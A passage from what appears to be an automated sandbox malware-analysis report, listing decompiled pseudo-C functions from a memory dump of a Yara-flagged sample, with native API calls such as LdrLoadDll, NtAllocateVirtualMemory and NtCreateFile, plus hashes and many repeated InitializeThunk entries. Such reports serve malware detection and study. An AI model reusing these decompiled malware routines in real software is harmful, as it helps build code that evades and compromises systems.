				return _t18;
			}






                                                  0x00418693
                                                  0x0041869f
                                                  0x004186a7
                                                  0x004186ac
                                                  0x004186b2
                                                  0x004186cd
                                                  0x004186d5
                                                  0x004186d9

                                                  APIs
                                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: 1:A$r=A$r=A
                                                  • API String ID: 2738559852-4243674446
                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                  0x00409b5c
                                                  0x00409b5f
                                                  0x00409b64
                                                  0x00409b69
                                                  0x00409b73
                                                  0x00409b78
                                                  0x00409b7b
                                                  0x00409b7d
                                                  0x00409b85
                                                  0x00409b8a
                                                  0x00409b8a
                                                  0x00409b91
                                                  0x00409b99
                                                  0x00409b9c
                                                  0x00409b9e
                                                  0x00409bb2
                                                  0x00000000
                                                  0x00409bb4
                                                  0x00409bba
                                                  0x00409b6e
                                                  0x00409b6e
                                                  0x00409b6e

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                  • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                  • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                  0x004185ef
                                                  0x004185f7
                                                  0x0041862d
                                                  0x00418631

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                  0x004187cf
                                                  0x004187d7
                                                  0x004187f9
                                                  0x004187fd

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004187BB, Relevance: 1.5, APIs: 1, Instructions: 26memorynativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004187BB(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t21 =  *0x5562a8cd * 0x458bec8b;
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                  0x004187bb
                                                  0x004187c3
                                                  0x004187cf
                                                  0x004187d7
                                                  0x004187f9
                                                  0x004187fd

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: f09095cd5b6a9544a6f0e9e18a22faf2f1ed35859d9bee4ad9e6c5697640f716
                                                  • Instruction ID: d26e086f4899a099631209f78a041247d2b067581e15ea028e9dd369e0fa6f80
                                                  • Opcode Fuzzy Hash: f09095cd5b6a9544a6f0e9e18a22faf2f1ed35859d9bee4ad9e6c5697640f716
                                                  • Instruction Fuzzy Hash: 07F030B6214149AFCB14DF98DC84CA777ADBF88214B15864DF94897202C634E855CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041870A, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E0041870A(void* __eax, void* _a4) {
				intOrPtr _v0;
				long _t9;
				void* _t13;

				asm("daa");
				asm("sahf");
				_t6 = _v0;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x409763
				E004191E0(_t13, _v0, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a4); // executed
				return _t9;
			}






                                                  0x0041870d
                                                  0x0041870e
                                                  0x00418713
                                                  0x00418716
                                                  0x0041871f
                                                  0x00418727
                                                  0x00418735
                                                  0x00418739

                                                  APIs
                                                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 834bf05beac496d91e8d749e79a2f058583c03398504b268f157390e46987bf6
                                                  • Instruction ID: ad72ad52e641dc8539ac39bf72a6b3608bdef4cb1018ab5f8c204f1dd4a9be75
                                                  • Opcode Fuzzy Hash: 834bf05beac496d91e8d749e79a2f058583c03398504b268f157390e46987bf6
                                                  • Instruction Fuzzy Hash: B6E08C726402246BD710EB988C49FD77BACEF48A90F154459FA589B242C530EA40C6E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                  0x00418713
                                                  0x00418716
                                                  0x0041871f
                                                  0x00418727
                                                  0x00418735
                                                  0x00418739

                                                  APIs
                                                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00750078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                  • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                  • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                  • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00750048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                  • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                  • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                  • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007500C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007507AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                  • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                  • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                  • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0074FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
